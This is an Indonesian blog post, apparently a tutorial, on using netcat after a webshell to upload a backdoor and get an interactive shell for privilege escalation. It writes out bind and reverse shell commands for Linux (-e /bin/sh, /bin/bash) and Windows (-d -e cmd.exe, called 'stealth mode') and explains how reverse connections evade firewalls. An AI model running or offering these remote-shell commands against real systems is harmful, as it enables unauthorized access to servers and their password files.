dalam melakukan proses previlege escalation, kita tidak bisa melakukan eksekusi langsung untuk melihat file /etc/passwd dan /etc/shadow atau mengeksekusi sebuah eksploit melewati sebuah webshell (shell yang dibuat dengan pemrograman web). maka dari itu, kita perlu mengupload sebuah shell backdoor agar mendapatkan shell secara interaktif.
tool yang sering digunakan untuk melakukan remote shell antara lain ssh(linux) atau telnet(windows) atau sebuah tool dari pihak ke tiga yaitu netcat (windows & linux). untuk windows, anda dapat mendapatkannya di sini, untuk linux biasanya telah terinstall waktu menginstall OS linux.
sebenarnya netcat memiliki banyak fungsi lain sehingga disebut swiss army knife karena kegunaanya. netcat dapat menjadi server maupun client (tapi netcat tidak peduli pada server maupun client) dapat melakukan bind mauupun reverse connection.
okelah... begini caranya melakukan bind connection
client | server linux | server windows |
---|---|---|
nc <ip server> <port> | nc -l -v -p <port> -e /bin/sh | nc -l -v -p <port> -d -e cmd.exe |
client | server linux | server windows |
---|---|---|
nc -l -v -p <port> | nc <ip client> <port> -e /bin/bash | nc <ip client> <port> -d -e cmd.exe |
- -d : stealth mode. khusus windows
- -l : listen mode
- -p : specify port untuk inbound connection
- -v atau -vv : verbose (opsional)
- -e : buka aplikasi setelah terkoneksi
karena banyak yang bertanya, akhirnya saya menjawab pertanyaan apa sih bedanya bind connection dengan reverse connection?. inilah bedanya :
bind :
merupakan metode koneksi dimana kita membuat koneksi ke komputer target melalui port yang telah dibuka oleh netcat. kelemahannya adalah masalah proteksi firewall yang mempunyai kebiasaan menutup port yang tertutup
reverse :
metode dimana kita berada pada posisi listening koneksi yang masuk, yang dibuat oleh target. kelebihannya adalahn rata-rata keberhasilan yang cukup tinggi karena tidak mendapat masalah firewall, namun kekurangannya, kita harus mendapatkan IP yang dapat diakses oleh publik agar netcat mengenali IP kita. namun lagi (:ngakak kebanyakan namun nih), fitur netcat terbaru yaitu gateway hopping dengan parameter "-g" dimana kita bisa mendapatkan gateway yang kita lalui dengan perintah "tracert <target>"". saya tidak yakin karena belum pernah mencoba cara ini :cendol
hehe... maaf nih kalo njelimet... kalau ada pertanyaan, silahkan tanyakan saja :jabat . semoga bermanfaat.
Posting Komentar
Give Ur eXPerience about this eXPerience...